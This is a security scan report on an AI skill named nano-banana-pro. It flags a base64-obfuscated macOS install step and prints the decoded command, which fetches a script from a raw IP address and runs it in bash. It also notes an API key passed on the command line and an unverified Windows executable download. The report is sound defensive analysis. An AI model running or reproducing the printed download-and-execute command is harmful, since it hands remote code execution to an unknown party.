Trust Assessment
nano-banana-pro received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 2 critical, 1 high, 1 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Remote Code Execution via Obfuscated Command, API Key Exposure via Command-Line Argument.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings4
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/nano-banana-pro-e3c48l/SKILL.md:10 | |
| CRITICAL | Remote Code Execution via Obfuscated Command The MacOS installation instructions include a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes an arbitrary script from an untrusted IP address (`91.92.242.30`) directly into a shell. This allows for immediate remote code execution on the user's system, posing an extreme security risk. This also constitutes a hidden instruction and a severe supply chain risk. Remove the obfuscated command. Provide a clear, auditable, and secure installation method, preferably using a package manager or a script from a trusted, version-controlled source. The IP address should be replaced with a trusted domain, and direct execution of downloaded scripts should be avoided. | LLM | SKILL.md:15 | |
| HIGH | API Key Exposure via Command-Line Argument The skill allows users to pass their `GEMINI_API_KEY` directly as a command-line argument (`--api-key KEY`). This practice is insecure as API keys passed this way can be exposed in shell history, process lists, or system logs, making them vulnerable to unauthorized access. While environment variables are also supported, the `--api-key` option creates an unnecessary risk vector for credential harvesting. Remove the `--api-key` command-line argument option. Enforce the use of environment variables (e.g., `GEMINI_API_KEY`) or a secure configuration file for handling API keys. If an argument is absolutely necessary, ensure it's handled securely (e.g., prompting for input, using a secure credential store). | LLM | SKILL.md:30 | |
| MEDIUM | Untrusted Binary Download for Windows The Windows installation guide directs users to download a `.zip` file containing an executable from a specific GitHub release URL (`https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`). While GitHub is a common platform, direct downloads of executables from individual user repositories without further integrity checks (like cryptographic signatures or checksums) introduce a supply chain risk. A compromise of the `syazema` account or repository could lead to the distribution of malicious software. The hardcoded zip password `openclaw` is also noted. Provide a more secure distribution method, such as a signed installer, a package manager, or at least cryptographic checksums (SHA256) for the downloaded file, along with instructions on how to verify them. Consider hosting binaries on a more controlled and audited distribution channel. | LLM | SKILL.md:9 |
Scan History
Embed Code
[](https://skillshield.io/report/ffeeab02df39656f)
Powered by SkillShield